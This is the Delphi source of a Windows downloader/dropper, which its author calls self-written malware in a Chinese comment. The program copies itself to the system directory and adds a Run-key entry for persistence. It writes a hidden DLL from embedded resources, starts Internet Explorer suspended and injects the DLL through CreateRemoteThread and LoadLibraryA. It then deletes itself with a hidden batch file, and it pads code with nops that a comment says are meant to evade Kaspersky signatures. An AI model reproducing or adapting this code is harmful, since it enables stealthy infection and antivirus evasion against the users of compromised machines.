main.dpr

我自己写的下载者代码啊 用很古老的代码完成编译的

program Main;

uses
  windows, RejoiceBase,tlhelp32,SysUtils2,Reg;


{$L 'SRT.obj'}
{$R DERC.RES}
{$R 'Down.RES' 'Down.rc'}

const
  ExeFiles = 'ceshi123.exe';
  DLLFiles = 'ceshi123.dll';
  IEFiles  = 'IEXPLORE.EXE';
var
  PID: DWORD;
  Process: DWORD;
  DllAllpath: string;
  StartInfo: TStartupInfo;
  ProcInfo: TProcessInformation;

function xVirtualFreeEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LOngWord; dwFreeType: LongWord): Boolean; stdcall; external;

function xCreateRemoteThread(hProcess: LongWord; lpThreadAttributes: Pointer; dwStackSize: LongWord; lpStartAddress: Pointer; lpParameter: Pointer; dwCreationFlags: LongWord; lpThreadId: Pointer): LongWord; stdcall; external;

function FileExists(pszPath: string): BOOL; stdcall; external 'shlwapi.dll' Name 'PathFileExistsA';

function xVirtualAllocEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LongWord; flAllocationType: LongWord; flProtect: LongWord): Pointer; stdcall; external;

function Gesy :string;
var sysdir:array [0..255] of char;
begin
  GetsystemDirectory(sysdir,255);
  Result :=sysdir;
  if copy(Result,length(Result),1)<>'\' then
  Result:=Result+'\';
end;

function FileSetAttr(const FileName: string; Attr: Integer): Integer;
begin
  Result := 0;
  if not SetFileAttributes(PChar(FileName), Attr) then
    Result := GetLastError;
end;

function DeleteFile(const FileName: string): Boolean;
begin
{$IFDEF MSWINDOWS}
  Result := Windows.DeleteFile(PChar(FileName));
{$ENDIF}
{$IFDEF LINUX}
  Result := unlink(PChar(FileName)) <> -1;
{$ENDIF}
end;

//释放DLL函数
function woyaoshifang(ResType, ResName, OutName: string): Boolean;
var
  HResInfo: THandle;
  HGlobal: THandle;
  HFile: THandle;
  Ptr: Pointer;
  Size, N: Integer;
begin
  HFile := INVALID_HANDLE_VALUE;
  repeat
    Result := False;
    HResInfo := FindResource(HInstance, PChar(ResName), PChar(ResType));
    if HResInfo = 0 then Break;
    HGlobal := LoadResource(HInstance, HResInfo);
    if HGlobal = 0 then Break;
    Ptr := LockResource(HGlobal);
    Size := SizeOfResource(HInstance, HResInfo);
    if Ptr = nil then Break;
    HFile := CreateFile(PChar(OutName), GENERIC_READ or GENERIC_WRITE,
      0, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
    if HFile = INVALID_HANDLE_VALUE then Break;
    if WriteFile(HFile, Ptr^, Size, LongWord(N), nil) then Result := True;
  until True;
  if HFile <> INVALID_HANDLE_VALUE then CloseHandle(HFile);
  SetFileAttributes(PChar(OutName), FILE_ATTRIBUTE_SYSTEM or FILE_ATTRIBUTE_HIDDEN or FILE_ATTRIBUTE_READONLY);
end;

function iedechaojidizhi: string;
var
  Path: string;
begin
  Path := Gesy;
  Delete(Path, Pos(':', Path) + 1, Length(Path));
  Path := Copy(Path, 0, Pos(':', Path));
  Path := Path + '\program files\internet explorer\iexplore.exe';
  Result := Path;
end;

function OpenKey123(Root:HKEY;StrPath:pchar):Hkey;
var TempKey:Hkey;
begin
	TempKey:=0;
	RegOpenKeyEx(Root,StrPath,0,KEY_ALL_ACCESS,TempKey);
	Result:=TempKey;
end;

procedure DelValue(Root:HKEY;StrPath:pchar;StrValue:pchar);
var s:Hkey;
begin
	s:=OpenKey123(Root,StrPath);
	RegDeleteValue(s,StrValue);
	RegCloseKey(s);
end;

//自删除
procedure ziwoshanchu;
var
  F: textfile;
  BatchFileName: string;
  ProcessInfo: TProcessInformation;
  StartUpInfo: TStartupInfo;
begin
  DelValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp', 'NoRealMode');
  BatchFileName := Gesy + 'Deleteme.bat';
  AssignFile(F, BatchFileName);
  Rewrite(F);
  WriteLn(F, ':try');
  WriteLn(F, 'del "' + ParamStr(0) + '"');
  WriteLn(F, 'if exist "' + ParamStr(0) + '"' + ' goto try');
  WriteLn(F, 'del %0');
  CloseFile(F);
  FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);
  StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
  StartUpInfo.wShowWindow := SW_HIDE;
  if CreateProcess(nil, PChar(BatchFileName), nil, nil, False, IDLE_PRIORITY_CLASS, nil, nil, StartUpInfo, ProcessInfo) then
  begin
    CloseHandle(ProcessInfo.hThread);
    CloseHandle(ProcessInfo.hProcess);
  end;
end;


function dizhiming(aFilename: string): string;
var
  Path, Filename, Ext: string;
begin
  Result := aFilename;
  Path := ExtractFilepath(aFilename);
  Ext := ExtractFileExt(aFilename);
  Filename := ExtractFilename(aFilename);
  if Length(Ext) > 0 then
    Filename := Copy(Filename, 1, Length(Filename) - Length(Ext));
  repeat
    Result := Path + Filename + inttoStr(Random(9999)) + Ext;
  until not FileExists(Result);
end;

function gaobudong(sProcName: string): Integer;
var
  hProcSnap: THandle;
  pe32: TProcessEntry32;
begin
  Result := -1;
  hProcSnap := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);
  if hProcSnap = INVALID_HANDLE_VALUE then Exit;
  pe32.dwSize := SizeOf(ProcessEntry32);
  if Process32First(hProcSnap, pe32) = True then
    while Process32Next(hProcSnap, pe32) = True do
    begin
      if AnsiStricomp(PChar(ExtractFilename(pe32.szExefile)), PChar(ExtractFilename(sProcName))) = 0 then
      begin
        Result := pe32.th32ProcessID;
        break;
      end;
    end;
  CloseHandle(hProcSnap);
end;


//插入进程
function woyaocharu(Process: LongWord; DLLPath: pChar): Boolean;
var
  BytesWritten: DWORD;
  Thread: DWORD;
  ThreadID: DWORD;
  Parameters: Pointer;
begin
  Result := False;
  Parameters := xVirtualAllocEx(Process, nil, 4096, MEM_COMMIT, PAGE_READWRITE);
  if Parameters = nil then Exit;
  WriteProcessMemory(Process, Parameters, Pointer(DLLPath), 4096, BytesWritten);
  Thread := xCreateRemoteThread(Process, nil, 0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'LoadLibraryA'), Parameters, 0, @ThreadId);
  WaitForSingleObject(Thread, INFINITE);
  xVirtualFreeEx(Process, Parameters, 0, MEM_RELEASE);
  if Thread = 0 then Exit;
  CloseHandle(Thread);
  Result := True;
end;


var
  isSetup: Bool;
  SetupPathName: string;
begin
  asm   //改成卡吧不能特征码
    nop
    nop
    nop
    nop
    nop
    nop
  end;
  SetupPathName := Gesy + ExeFiles;
  if (CompareText(paramstr(0), SetupPathName) <> 0) then
  begin
    asm   //改成卡吧不能特征码
    nop
    nop
  end;
    try
      if FileExists(SetupPathName) then
      begin
        FilesetAttr(SetupPathName, 0);
        DeleteFile(SetupPathName);
        if FileExists(SetupPathName) then
        begin
          Halt;
          Exit;
        end;
      end;
      CopyFile(pchar(paramstr(0)), pchar(SetupPathName), False);
    except
    end;
   isSetup := True;
   // if judgesys = 3 then
   // begin
    //  Reg.AddValue(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', 'Shell', pchar('Explorer.exe '+Gesy+ ExeFiles), 1);
  //  end
   // else
  //  begin
     Reg.AddValue(HKEY_CURRENT_USER, 'SoftWare\Microsoft\Windows\CurrentVersion\Run', ExeFiles, pchar(Gesy + ExeFiles), 1);
  //  end;
  end;
  if FindWindow('Dow', 'Dow IDE') = 0 then
  begin
    DllAllpath := Gesy + DLLFiles;
    try
      FilesetAttr(DllAllpath, 0);
      DeleteFile(DllAllpath); {删除现有的DLL文件}
    except
    end;
    if FileExists(DllAllpath) then {如果删除失败，则改名}
    begin
      DllAllpath := dizhiming(DllAllpath);
    end;
    if woyaoshifang('dllfile', 'Dedll', DllAllpath) then {生成新的DLL插入文件}
    begin
      if IEFiles = 'IEXPLORE.EXE' then
      begin
      CreateProcess(nil, PChar(iedechaojidizhi), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo);
      end;
      PID := gaobudong(IEFiles);
      Process := OpenProcess(PROCESS_ALL_ACCESS, False, PID); {打开要潜入的进程}
      woyaocharu(Process, Pchar(DllAllpath));
    end;
  end;
  if isSetup then
    ziwoshanchu;
    Halt;
end.